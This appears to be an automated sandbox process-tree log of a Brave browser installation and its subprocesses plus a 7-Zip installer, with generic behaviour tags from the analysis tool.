      "C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:4076
    - - C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe
        
        "C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff6a06df418,0x7ff6a06df424,0x7ff6a06df430
        5⤵
        Executes dropped EXE
        
        PID:1520
    - - C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe
        
        "C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\BraveSoftware\Brave-Browser\Application\initial_preferences" --create-shortcuts=1 --install-level=0
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        
        PID:2780
      - C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe
        
        "C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff6a06df418,0x7ff6a06df424,0x7ff6a06df430
        6⤵
        Executes dropped EXE
        
        PID:2948
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5668,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5696 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:568
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5760,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5768 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3200
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5792,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5928 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3196
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6084,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6092 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4772
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6100,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6112 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3500
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4956,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=4964 /prefetch:14
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2760
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5600,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6036 /prefetch:1
      4⤵
      Executes dropped EXE
      PID:4036
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4972,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5592 /prefetch:1
      4⤵
      Executes dropped EXE
      PID:2164
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=2948,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=2936 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:2996
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=2960,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3732 /prefetch:14
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4596
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5812,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5836 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:4540
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5900,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3640 /prefetch:14
      4⤵
      Executes dropped EXE
      NTFS ADS
      PID:3356
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5952,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5652 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:4384
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5732,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5720 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:1356
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6048,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5776 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:1632
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=3724,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5344 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:5440
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5032,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5236 /prefetch:14
      4⤵
      Executes dropped EXE
      PID:5672
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations=is-enterprise-managed=no --start-stack-profiler --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5772,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5544 /prefetch:10
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:6060
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5984,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5936 /prefetch:14
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3412
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5136,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5836 /prefetch:14
      4⤵
      Executes dropped EXE
      NTFS ADS
      PID:5172
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5044,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5532 /prefetch:14
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5308
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5876,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5516 /prefetch:14
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5400
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5464,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5400 /prefetch:14
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5652
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5568,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5244 /prefetch:14
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5780
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5264,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5696 /prefetch:14
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5860
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5512,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5116 /prefetch:14
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:1964
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5560,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5536 /prefetch:14
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:3196
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5972,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5416 /prefetch:14
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5972
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=3324,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5360 /prefetch:14
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1496
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5076,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5332 /prefetch:14
      4⤵
      PID:552
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=5024,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5220 /prefetch:1
      4⤵
      PID:2940
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5384,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5524 /prefetch:14
      4⤵
      NTFS ADS
      PID:5312
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4992,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5380 /prefetch:14
      4⤵
      PID:4640
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=6232,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6212 /prefetch:1
      4⤵
      PID:816
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=6400,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5208 /prefetch:1
      4⤵
      PID:1308
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6448,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6396 /prefetch:14
      4⤵
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:1256
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6504,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5752 /prefetch:14
      4⤵
      PID:2296
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6592,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6468 /prefetch:14
      4⤵
      NTFS ADS
      PID:3144
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=6396,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6632 /prefetch:1
      4⤵
      PID:4552
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=6436,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6264 /prefetch:1
      4⤵
      PID:5272
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=5108,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5444 /prefetch:1
      4⤵
      PID:5940
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=3764,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6484 /prefetch:14
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:5960
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5196,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5052 /prefetch:14
      4⤵
      Subvert Trust Controls: Mark-of-the-Web Bypass
      NTFS ADS
      PID:6140
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=3692,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6564 /prefetch:14
      4⤵
      PID:4748
  - - C:\Users\Admin\Desktop\7z2409-x64.exe
      "C:\Users\Admin\Desktop\7z2409-x64.exe"
      4⤵
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1724
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=3660,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=7092 /prefetch:1
      4⤵
      PID:2996
